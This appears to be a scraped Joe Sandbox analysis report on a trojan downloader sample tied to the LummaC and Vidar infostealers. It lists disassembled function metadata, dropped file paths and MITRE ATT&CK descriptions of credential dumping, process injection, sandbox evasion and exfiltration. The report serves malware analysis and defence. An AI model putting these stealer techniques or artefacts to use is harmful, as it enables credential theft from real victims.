Instruction Fuzzy Hash: 13F0B4B4B043C55BEB00ABB5AC98B1A33B9EB1130DF048474E85AC7F60FE21E449C522

Function 6CC7CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6CC7CC61
free.MOZGLUE ref: 6CC7CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6CC7CC80
free.MOZGLUE(?), ref: 6CC7CC87

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 8130a3c25930976a18b62c27d0e3dbbe3912aa6b472a0ff20f967dc6b304797d
Instruction ID: 67475be92497bace57bb8777afe2a53dfa5829b74cb33632d7958c778e95a205
Opcode Fuzzy Hash: 8130a3c25930976a18b62c27d0e3dbbe3912aa6b472a0ff20f967dc6b304797d
Instruction Fuzzy Hash: 81E06DB6700608AFCA10EFA8DC88C8B77BCEE8A2713150525EA91D3700D232F905CBE5

Function 6CBB4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6CBB4D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6CBB4DE6

Strings

%d.%d, xrefs: 6CBB4DDE

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: c5e15cb99325d79c0a8a29633c930044ade431ef3a75b2feba247163be736cab
Instruction ID: 55bbad51024cad66830ff9329117f72949a32bdb50a6e24469b9d18044a7d44f
Opcode Fuzzy Hash: c5e15cb99325d79c0a8a29633c930044ade431ef3a75b2feba247163be736cab
Instruction Fuzzy Hash: C931DEB2D042696BEB109B659C05BFF7778EF41308F050469ED1567781EF709D05CBA2

Function 6CBC0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6CBC0DF5
TlsGetValue.KERNEL32 ref: 6CBC0E2D
TlsGetValue.KERNEL32 ref: 6CBC0E58
TlsGetValue.KERNEL32 ref: 6CBC0E84

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: 85a80a9fb3d7511a88f7035b2a14c54e81ce0a416ba0b9dd2dca32b7efe9b183
Instruction ID: aeface81ef8f096e5a3cc474d8222d7d6d274d851ae04183de601309de5063be
Opcode Fuzzy Hash: 85a80a9fb3d7511a88f7035b2a14c54e81ce0a416ba0b9dd2dca32b7efe9b183
Instruction Fuzzy Hash: 11319EB0F843D68FDB00AF7CE5842697BB4FF06308F114669D89887A11EB349095CB83

Function 6CB1A4E0 Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,6CB1A468,00000000), ref: 6CB1A4F9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6CB1A468,00000000), ref: 6CB1A51B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CB1A468,?,6CB1A468,00000000), ref: 6CB1A545
memcpy.VCRUNTIME140(00000001,6CB1A468,00000001,?,?,?,6CB1A468,00000000), ref: 6CB1A57D

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction ID: b91347aee019df3e1efe89daaf6c006f7163ea11463157137063fb5194e2ec2d
Opcode Fuzzy Hash: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction Fuzzy Hash: D3110AB3D0835557DB008DB99CC16EB77A9DF55268F284234ED2487780F639AD0C87E1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AKEGIIJDGH.exe

C:\ProgramData\BKFIJJEGHDAE\AECAKE

C:\ProgramData\BKFIJJEGHDAE\BGIIDA

C:\ProgramData\BKFIJJEGHDAE\BGIIDA-shm

C:\ProgramData\BKFIJJEGHDAE\BKFIJJ

C:\ProgramData\BKFIJJEGHDAE\BKFIJJ-shm

C:\ProgramData\BKFIJJEGHDAE\CFHCGH

C:\ProgramData\BKFIJJEGHDAE\FHCAEG

C:\ProgramData\BKFIJJEGHDAE\GDAAKF

Windows Analysis Report
SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre